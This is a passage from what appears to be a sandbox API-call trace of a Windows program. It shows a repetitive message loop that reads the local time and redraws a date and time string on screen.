wMilliseconds=0x2e9)) [0120.004] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x2e9)) [0120.004] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.014] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.014] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.014] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x2f3)) [0120.014] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x2f3)) [0120.014] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.035] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.035] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.035] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x308)) [0120.035] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x308)) [0120.035] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.060] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.065] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.065] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x326)) [0120.065] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x326)) [0120.065] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.079] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.079] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.079] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x334)) [0120.079] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x334)) [0120.079] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.089] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.089] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.089] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x33e)) [0120.089] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x33e)) [0120.089] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.110] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.110] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.110] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x353)) [0120.110] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x353)) [0120.110] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.121] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.121] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.122] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x35e)) [0120.122] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x35f)) [0120.122] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.142] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.142] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.142] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x373)) [0120.142] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x373)) [0120.142] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.153] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.153] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.153] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x37e)) [0120.153] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x37e)) [0120.153] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.175] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.175] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.175] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x394)) [0120.175] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x394)) [0120.175] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.187] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.187] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.187] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x3a0)) [0120.187] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x3a0)) [0120.187] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.198] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.198] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.198] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x3ab)) [0120.198] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x3ab)) [0120.198] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.219] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.219] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.219] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x3c0)) [0120.220] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x3c1)) [0120.220] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.244] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.244] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.244] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x3d9)) [0120.251] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x3e0)) [0120.252] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.254] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.254] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.254] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x3e3)) [0120.254] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x31, wMilliseconds=0x3e3)) [0120.254] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.264] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.264] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.264] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x5)) [0120.264] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x5)) [0120.264] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0120.264] GetDC (hWnd=0x0) returned 0xa0100d0 [0120.265] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0120.265] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0120.265] GetSysColor (nIndex=8) returned 0x0 [0120.265] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0120.265] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0120.265] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0120.265] UnrealizeObject (h=0x2d10099f) returned 1 [0120.266] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0120.266] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0120.266] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0120.266] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:49:50 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:49:50 PM", lprc=0x19f5bd) returned 13 [0120.268] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0120.268] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0120.268] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0120.268] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0120.268] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0120.268] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.285] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.285] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.285] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x1a)) [0120.285] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x1a)) [0120.285] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.296] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.296] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.296] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x25)) [0120.296] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x25)) [0120.296] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.318] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.318] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.318] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x3b)) [0120.318] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x3b)) [0120.318] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.329] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.329] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.329] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x46)) [0120.329] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x46)) [0120.329] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.340] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.340] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.340] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x51)) [0120.340] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x51)) [0120.340] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.361] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.361] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.361] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x66)) [0120.361] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x66)) [0120.361] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.371] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.371] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.371] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x70)) [0120.371] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x70)) [0120.371] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.393] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.393] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.393] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x86)) [0120.393] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x86)) [0120.393] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.404] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.404] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.404] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x91)) [0120.404] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x91)) [0120.404] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.426] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.426] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.426] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0xa7)) [0120.426] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0xa7)) [0120.426] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.436] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.436] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.436] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0xb1)) [0120.436] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0xb1)) [0120.436] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.457] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.457] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.457] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0xc6)) [0120.457] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0xc6)) [0120.457] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.468] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.468] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.468] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0xd1)) [0120.468] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0xd1)) [0120.468] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.496] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.496] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.496] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0xed)) [0120.496] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0xed)) [0120.496] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.518] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.518] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.518] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x103)) [0120.518] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x103)) [0120.518] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.529] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.529] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.529] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x10e)) [0120.529] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x10e)) [0120.529] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.542] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.542] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.542] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x11b)) [0120.542] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x11b)) [0120.542] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.562] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.562] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0120.562] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x12f)) [0120.562] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x32, wMilliseconds=0x12f)) [0120.562] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0120.573] TranslateMessage (lpMsg=0x2347a14) returned 0 [0120.573] DispatchMessageA (lpMsg=0x2347a14) 